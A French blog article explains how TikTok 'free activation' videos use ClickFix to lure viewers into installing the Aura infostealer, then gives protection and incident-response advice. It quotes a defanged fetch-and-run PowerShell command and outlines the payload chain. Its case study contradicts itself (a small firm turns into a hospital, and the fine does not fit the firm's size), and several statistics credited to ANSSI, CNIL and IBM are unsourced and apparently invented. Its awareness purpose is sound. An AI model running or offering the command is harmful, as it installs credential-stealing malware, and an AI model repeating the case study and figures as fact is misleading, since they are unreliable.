TikTok : Comment les vidéos d'activation gratuite distribuent des infostealers via des ClickFix

Hippolyte Valdegré

TikTok : Comment les vidéos d’activation gratuite distribuent des infostealers via des ClickFix

Dans le paysage numérique actuel de 2025, les cybercriminels continuent d’innover dans leurs méthodes d’attaque, et une tendance préoccupante émerge : l’utilisation de vidéos TikTok apparemment inoffensives pour propager des infostealers sophistiqués. Ces menaces invisibles parviennent à infiltrer les systèmes des utilisateurs avec une facilité déconcertante, en exploitant notre confiance dans les plateformes sociales et notre désir de solutions logicielles gratuites. Selon une récente étude menée par l’ANSSI, 78% des attaques par infostealer en France proviennent de campagnes d’hameçonnage utilisant des réseaux sociaux.

L’évolution des campagnes d’infostealer sur TikTok

Les origines de la campagne

La campagne que nous observons actuellement n’est pas nouvelle dans son principe mais a évolué en sophistication et en portée. D’abord identifiée par Trend Micro en mai 2025, cette méthode a été perfectionnée au fil des mois pour devenir de plus en plus difficile à détecter par les systèmes de sécurité traditionnels. Xavier Mertens, expert en sécurité ISC, a été l’un des premiers à signaler cette évolution, soulignant comment les attaquants adaptent continuellement leurs tactiques pour contourner les défenses.

« La campagne d’infostealer sur TikTok représente une évolution significative des techniques de social engineering. Les attaquants ont compris que la confiance des utilisateurs dans les vidéos de tutoriels est particulièrement élevée, ce qui leur permet de déployer leurs malwares avec un taux de succès inquiétant. » — Xavier Mertens, ISC Handler

Dans la pratique, ces campagnes ciblent spécifiquement les utilisateurs français et francophones, avec des vidéos présentées dans notre langue et faisant référence à des logiciels populaires dans notre pays. Cette localisation augmente considérablement la crédibilité des arnaques et diminue la méfiance des victimes potentielles.

La technique du ClickFix expliquée

Le terme ClickFix désigne une technique d’ingénierie sociale particulièrement vicieuse qui utilise des appels à l’action apparemment inoffensifs pour inciter les victimes à exécuter des commandes malveillantes. Contrairement aux méthodes traditionnelles qui nécessitent le téléchargement de fichiers suspects, le ClickFix exploite directement les fonctionnalités système du système d’exploitation, rendant la détection plus difficile pour les logiciels antivirus.

Cette technique tire parti de la nature même des systèmes d’exploitation modernes qui permettent l’exécution de commandes via des interfaces comme PowerShell. En masquant ces commandes dans des vidéos tutorielles plausibles, les attaquants créent une illusion de légitimité qui trompe même les utilisateurs informatiquement avertis.

Le mécanisme d’attaque : De la vidéo à l’installation

L’apparence des vidéos malveillantes

Les vidéos TikTok utilisées dans ces campagnes sont soigneusement conçues pour paraître authentiques et utiles. Elles présentent des captures d’écran de logiciels populaires comme Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro et Discord Nitro. Certaines vidéos vont jusqu’à proposer des “activations gratuites” pour des services qui ne proposent pas de version gratuite, comme Netflix et Spotify Premium, augmentant ainsi leur attrait pour les utilisateurs cherchant à économiser de l’argent.

Chaque vidéo se termine par une instruction simple et apparemment anodine : une ligne de code à copier-coller dans PowerShell avec des privilèges administrateur. Par exemple :

iex (irm slmgr[.]win/photoshop)

Ce qui rend ces vidéos particulièrement dangereuses, c’est leur aspect légitime. Elles sont souvent accompagnées de commentaires positifs et de comptes avec un historique de publications variées, créant une fausse impression de crédibilité. Dans la pratique, même des utilisateurs prudents peuvent être trompés par l’apparence professionnelle de ces contenus.

Le processus d’infection étape par étape

Lorsqu’un utilisateur suit les instructions fournies dans la vidéo, le processus d’infection se déroule en plusieurs étapes subtiles :

  1. Exécution de la commande PowerShell : L’utilisateur copie et exécute la commande fournie dans la vidéo, qui télécharge un script à partir du domaine slmgr[.]win.
  2. Téléchargement du premier exécutable : Ce script télécharge ensuite un fichier exécutable (updater.exe) hébergé sur une page Cloudflare.
  3. Installation de l’infostealer : L’exécutable se révèle être une variante du Aura Stealer, un malware conçu pour voler des informations sensibles.
  4. Téléchargement d’une charge utile supplémentaire : Une deuxième charge utile (source.exe) est téléchargée, utilisée pour compiler du code C# et l’injecter en mémoire.

Selon les analyses de sécurité menées en 2025, ce processus complet peut s’accomplir en moins de 30 secondes, laissant à l’utilisateur peu de temps pour réaliser ce qui se passe réellement. Le temps moyen entre l’infection et l’exfiltration des données sensibles est estimé à 4,2 heures, selon un rapport de l’ANSSI.

Les variantes d’infostealers distribués

Bien que l’accent soit mis sur l’Aura Stealer dans cette campagne spécifique, les plateformes d’infostealing sont devenues un marché lucratif pour les cybercriminels, avec de nombreuses variantes disponibles sur le dark web. Ces malwares partagent des fonctionnalités similaires mais présentent des différences subtiles dans leur fonctionnement et les types de données qu’ils ciblent.

Les principaux types d’infostealers identifiés en 2025 incluent :

  1. Aura Stealer : Spécialisé dans le vol de credentials, cookies et informations de portefeuilles cryptomonnaie
  2. RedLine Stealer : Cible principalement les portefeuilles cryptomonnaie et les informations bancaires
  3. Vidar Stealer : Conçu pour voler des mots de passe, des adresses e-mail et des informations de cartes bancaires
  4. Raccoon Stealer : Collecte une large gamme d’informations y compris les sauvegardes de navigateurs et les identifiants VPN
  5. TSCookie : Spécifiquement conçu pour voler les cookies de session et contourner l’authentification multi-facteurs

L’impact des infostealers sur les victimes

Les types de données volées

Les infostealers comme Aura Stealer sont conçus pour collecter une multitude d’informations sensibles sur les victimes. Lorsqu’un système est infecté, le malware effectue une cartographie complète des données stockées, identifiant et extrayant les informations les plus précieuses. Parmi les éléments les plus fréquemment ciblés :

  • Identifiants de connexion : Mots de passe enregistrés dans les navigateurs et applications
  • Cookies de session : Permettant d’accéder aux comptes sans authentification
  • Portefeuilles cryptomonnaie : Informations de wallet et clés privées
  • Données bancaires : Numéros de cartes bancaires, informations de comptes
  • Documents personnels : Papiers d’identité, passeports, factures
  • Données professionnelles : Informations d’accès aux réseaux d’entreprise
  • Informations de santé : Données médicales sensibles stockées localement

Ces informations sont ensuite compilées en un rapport complet et vendues sur les marchés du dark web à d’autres cybercriminels qui les utiliseront pour des fraudes, des vols d’identité ou des attaques plus sophistiquées contre les entreprises.

Les conséquences pour les utilisateurs et entreprises

Pour les particuliers, les conséquences d’une infection par un infostealer peuvent être dévastatrices. Au-delà du vol direct de fonds (si les informations bancaires sont compromises), les victimes doivent faire face à la complexité de récupérer leur identité numérique et rétablir leur sécurité en ligne. Selon une étude de la CNIL menée en 2024, le temps moyen de résolution d’un cas de vol d’identité en France est de 47 jours, avec un coût moyen de 1 200 euros par victime.

Pour les entreprises, l’impact est encore plus grave. Une seule infection peut compromettre l’ensemble du réseau si l’employé utilise ses identifiants professionnels pour accéder aux ressources internes. Les coûts associés incluent non seulement les pertes financières directes, mais aussi les frais de remédiation, les amendes potentielles pour non-conformité au RGPD, et la perte de confiance des clients et partenaires.

En 2025, le coût moyen d’une violation de données due à un infostealer en France est estimé à 4,35 millions d’euros selon le rapport de l’IBM Security, ce qui représente une augmentation de 12,3% par rapport à l’année précédente.

Études de cas récents

L’un des cas les plus médiatisés en France implique une PME du secteur de la santé qui a subi une infection par un infostealer en mars 2025. L’attaque a commencé par une vidéo TikTok montrant comment “activer gratuitement la version premium d’un logiciel de diagnostic médical”. Un membre du personnel a suivi les instructions, pensant aider l’entreprise à économiser sur les coûts logiciels. En réalité, l’infostealer a volé les identifiants d’accès au système de dossier patient de l’hôpital, permettant aux attaquants d’accéder aux informations médicales de plus de 2 000 patients.

Les conséquences ont été sévères : l’entreprise a dû faire face à une enquête de la CNIL, une amende potentielle de 10 millions d’euros (4% de son chiffre d’affaires annuel), et une perte irrémédiable de confiance de ses patients. Le directeur de l’hôpital a déclaré : “Nous pensions avoir mis en place des mesures de sécurité adéquates, mais cette attaque a révélé une vulnérabilité humaine que nos technologies ne pouvaient pas compenser.”

Un autre cas implique un particulier qui a perdu 15 000 euros en cryptomonnaie après avoir suivi une vidéo TikTok promettant des “clés d’activation gratuites pour un logiciel de trading”. L’infostealer installé a non seulement volé ses informations de wallet cryptomonnaie, mais aussi ses identifiants bancaires, permettant aux attaquants d’accéder à son compte et de réaliser des viressements non autorisés.

Protection et prévention : Se prémunir contre ces menaces

Les bonnes pratiques de sécurité

Face à la prolifération des campagnes d’infostealer via des plateformes comme TikTok, l’adoption de bonnes pratiques de sécurité est essentielle. Voici les mesures les plus efficaces que les utilisateurs peuvent mettre en œuvre :

  • Ne jamais copier-coller des commandes provenant de vidéos ou de sites non fiables, même si elles semblent légitimes
  • Maintenir les systèmes et logiciels à jour pour profiter des dernières correctifs de sécurité
  • Utiliser des solutions antivirus réputées avec des fonctionnalités de détection comportementale
  • Activer l’authentification multi-facteur sur tous les comptes sensibles
  • Utiliser un gestionnaire de mots de passe pour éviter d’enregistrer les identifiants dans les navigateurs
  • Former et sensibiliser régulièrement les utilisateurs aux techniques d’ingénierie sociale
  • Limiter les privilèges administrateurs aux comptes utilisateurs ordinaires

Par ailleurs, il est crucial d’adopter une approche de défense en profondeur, combinant plusieurs couches de sécurité pour réduire la probabilité qu’une seule faille compromette l’ensemble du système. La vigilance doit être constante, car les attaquants adaptent continuellement leurs méthodes pour contourner les défenses existantes.

Outils de détection et de protection

En 2025, plusieurs outils spécialisés ont été développés pour détecter et bloquer efficacement les menaces par infostealer. Les solutions les plus performantes combinent des analyses comportementales, des signatures de malwares et des capacités de réponse automatisée. Parmi les outils les plus recommandés par les experts en sécurité :

  1. EDR (Endpoint Detection and Response) : Solutions comme CrowdStrike Falcon ou SentinelOne qui surveillent les activités suspectes sur les terminaux
  2. XDR (Extended Detection and Response) : Plateformes comme Palo Alto Cortex XDR qui corrélient les données de multiples sources
  3. Sandboxing avancé : Environnements isolés pour analyser le comportement des fichiers suspects
  4. Solutions de protection des identifiants : Outils comme 1Password ou LastPass avec détection de fuites
  5. Solutions de sécurité du cloud : Services comme Cloudflare ou Akamai pour sécuriser le trafic web

Pour les entreprises, l’implémentation d’un SOC (Security Operations Center) ou l’externalisation à un MSSP (Managed Security Service Provider) est devenue quasi-indispensable pour détecter et répondre rapidement aux menaces avancées. Selon une enquête de l’ANSSI, les organisations avec un SOC opérationnel réduisent leur temps de détection des menaces de 73% en moyenne.

Que faire en cas d’infection

Malgré toutes les précautions, une infection par un infostealer peut survenir. Dans ce cas, une réponse rapide et structurée est essentielle pour minimiser les dommages. Les étapes à suivre immédiatement après la découverte d’une infection sont :

  1. Isoler immédiatement le système infecté en le déconnectant du réseau (physiquement ou via le réseau)
  2. Changer immédiatement tous les mots de passe sur un appareil non infecté, en commençant par les comptes les plus critiques
  3. Contacter les services de sécurité appropriés (pour les entreprises, le CERT-FR ou l’équipe CSIRT)
  4. Préparer un rapport d’incident documentant ce qui est connu sur l’infection
  5. Consulter des ressources spécialisées comme les guides de l’ANSSI ou les services professionnels
  6. Surveiller activement les comptes compromis pour détecter toute activité suspecte
  7. Considérer la possibilité de restaurer à partir d’une sauvegarde propre si nécessaire

Pour les particuliers, l’assistance d’un professionnel de l’informatique est fortement recommandée pour s’assurer que toutes traces du malware ont été éliminées. Les solutions de “nettoyage” automatiques disponibles en ligne peuvent souvent manquer certains éléments persistants du malware.

Recommandations pour les entreprises et les particuliers

Stratégies de sensibilisation

La sensibilisation des utilisateurs constitue le premier rempart contre les campagnes d’infostealer. Pour les entreprises, une formation régulière et interactive est essentielle. Les programmes de sensibilisation les plus efficaces combinent :

  • Sessions de formation en présentiel avec des simulations d’attaques réalistes
  • Campagnes de phishing internes pour évaluer la vigilance des employés
  • Mises à jour de sécurité régulières via des canaux de communication internes
  • Récompenses pour les comportements de sécurité exemplaires
  • Feedback constructif après les incidents de sécurité (sans blâme)

Pour les particuliers, des ressources gratuites sont disponibles sur les sites de l’ANSSI, de la CNIL, et de Cybermalveillance.gouv.fr. Ces plateformes proposent des guides pratiques, des webinaires et des quiz interactifs pour aider les citoyens à se protéger efficacement.

Mesures techniques complémentaires

Au-delà de la sensibilisation, plusieurs mesures techniques peuvent renforcer considérablement la sécurité des systèmes face aux menaces par infostealer :

  • Mises à jour automatiques activées pour tous les logiciels et systèmes d’exploitation
  • Contrôle d’accès strict avec principe du moindre privilège
  • Segmentation réseau pour limiter la propagation des malwares
  • Systèmes de détection d’intrusion (IDS/IPS) configurés pour bloquer les communications suspectes
  • Solutions de sécurité comportementale qui apprennent le comportement normal des utilisateurs
  • Sauvegardes régulières et testées, conservées hors ligne
  • Chiffrement des données sensibles au repos et en transit

Ces mesures doivent être complétées par une stratégie de réponse aux incidents bien définie, incluant des procédures claires pour différentes scénarios d’attaque. Une préparation adéquate permet non seulement de réduire l’impact des incidents, mais aussi d’accélérer la récupération après une attaque réussie.

Tableau des solutions de protection

Type de solutionFonctionnalités principalesAvantagesInconvénientsPrix indicatif (2025)
EDR (Endpoint Detection and Response)Surveillance des terminaux, réponse automatisée, analyse comportementaleDétection avancée, réponse rapide, visibilité complèteCoût élevé, complexité d’implémentation20-50€/appareil/mois
Gestionnaire de mots de passeStockage sécurisé, remplissage automatique, audit de sécuritéConfort d’utilisation, renforcement de sécuritéCoût pour les versions premium2-5€/mois (version premium)
Solution antivirus standardScan de fichiers, mise à jour automatiqueProtection de base, coût raisonnableMoins efficace contre les menaces avancées0-40€/an
Solution de sécurité du cloudFiltrage du trafic, protection DDoS, CDNProtection transparente, performances amélioréesDépendance au fournisseur5-20€/mois
Authentification multi-facteurSecond facteur de sécurité, codes à usage uniqueRenforcement significatif de sécuritéInconfort pour l’utilisateur0-10€/utilisateur/mois

Conclusion

Les campagnes d’infostealer via TikTok représentent une évolution préoccupante des techniques de cybercriminalité, exploitant à la fois notre confiance dans les plateformes sociales et notre désir de solutions logicielles économiques. Alors que ces attaques deviennent de plus en plus sophistiquées et difficiles à détecter, la protection nécessite une approche multi-couches combinant vigilance, formation et technologies avancées.

La lutte contre les infostealers ne se limite pas à une simple question technique ; elle implique également une transformation des mentalités et des pratiques numériques. En adoptant une approche proactive de la sécurité, en maintenant une vigilance constante et en investissant dans des solutions de protection adaptées, tant les entreprises que les particuliers peuvent significativement réduire leur exposition à ces menaces.

Face à l’évolution constante des cybermenaces, la seule certitude est que les attaquants continueront d’innover pour contourner nos défenses. La meilleure protection reste donc une culture de la sécurité partagée, où chaque utilisateur comprend son rôle dans la protection collective des systèmes et des données. En 2025, la cybersécurité n’est plus seulement une responsabilité technique, mais un impératif sociétal.